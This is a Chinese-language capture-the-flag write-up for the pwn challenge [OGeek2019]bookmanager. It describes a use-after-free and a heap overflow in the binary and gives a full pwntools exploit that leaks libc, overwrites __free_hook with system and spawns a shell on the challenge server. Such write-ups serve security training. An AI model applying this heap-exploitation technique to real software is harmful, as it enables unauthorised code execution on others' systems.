oin

writeup


[OGeek2019]bookmanager

<p>[TOC]</p> <h1>分析</h1> <p>该题的漏洞还挺多的,我就找到了两个</p> <p><img src="https://pic.imgdb.cn/item/63a8691e08b68301639b1efe.png" alt="" />  </p> <p>Section删除存在UAF</p> <p><img src="https://pic.imgdb.cn/item/63a8698c08b68301639bc129.png" alt="" />  </p> <p>Text更新存在堆溢出,Chapter是申请一个0x90的chunk,Section是0x40的chunk,Text是小于0x100的chunk,那么我们可以释放Chapter,然后通过Text溢出来泄露unsortedbin地址,接着再申请几个Section直到有一个chunk申请到Text的chunk下,然后写入Section的Text指针为__free_hook,写入system</p> <h1>Exploit</h1> <pre><code>from pwn import* # context.log_level = 'debug' # o = process('./pwn') o = remote('node4.buuoj.cn', 29446) libc = ELF('./libc-2.23.so') o.sendlineafter('Name of the book you want to create: ', 'name') def addChapter(name):     o.sendlineafter('Your choice:', '1')     o.sendlineafter('Chapter name:', name)     def addSection(chapter, section):     o.sendlineafter('Your choice:', '2')     o.sendlineafter('Which chapter do you want to add into:', chapter)     addr = int(o.recvline()[2:-1], 16)     o.sendlineafter('Section name:', section)     return addr def addText(section, num, text):     o.sendlineafter('Your choice:', '3')     o.sendlineafter('Which section do you want to add into:', section)     o.sendlineafter('How many chapters you want to write:', str(num))     o.sendlineafter('Text:', text)     def rmChapter(chapter):     o.sendlineafter('Your choice:', '4')     o.sendlineafter('Chapter name:', chapter) def rmSection(section):     o.sendlineafter('Your choice:', '5')     o.sendlineafter('Section name:', section)     def rmText(section):     o.sendlineafter('Your choice:', '6')     o.sendlineafter('Section name:', section)     def updateSection(section, text):     o.sendlineafter('Your choice:', '8')     o.sendlineafter('What to update?(Chapter/Section/Text):', 'Section')     o.sendlineafter('Section name:', section)     o.sendlineafter('New Section name:', text)     def updateText(section, text):     o.sendlineafter('Your choice:', '8')     o.sendlineafter('What to update?(Chapter/Section/Text):', 'Text')     o.sendlineafter('Section name:', section)     o.sendlineafter('New Text:', text)     # 泄露unsorted bin addChapter('a'*8) addSection('a'*8, 'b'*8) addText('b'*8, 0xf0, 'd'*6) addChapter('e'*8) addSection('e'*8, 'f'*8) rmChapter('e'*8) updateText('b'*8, 'd'*0x100) o.sendlineafter('Your choice:', '7') o.recvuntil("d"*0x100) malloc_hook = u64(o.recv(6)+"\x00\x00") - 0x68 libc_base = malloc_hook - libc.sym['__malloc_hook'] log.info("libc_base: %x", libc_base) free_hook = libc.sym['__free_hook'] + libc_base system = libc.sym['system'] + libc_base # 申请到Text之下的Section然后溢出写入__free_hook,再写入__free_hook system updateText('b'*8, 'd'*0xf0+p64(0)+p64(0x91)) rmText('b'*8) addText('b'*8, 0x10, 'cccc') addSection('a'*8, 'h'*8) addSection('a'*8, '/bin/sh\x00') updateText('b'*8, p64(0)*3 + p64(0x41) + '/bin/sh\x00' + p64(0)*3 + p64(free_hook)) updateText('/bin/sh\x00', p64(system)) # 获取shell rmSection('/bin/sh\x00') o.interactive() </code></pre> <p><img src="https://pic.imgdb.cn/item/63a86a7508b68301639d6153.png" alt="" /></p>

页面列表

ITEM_HTML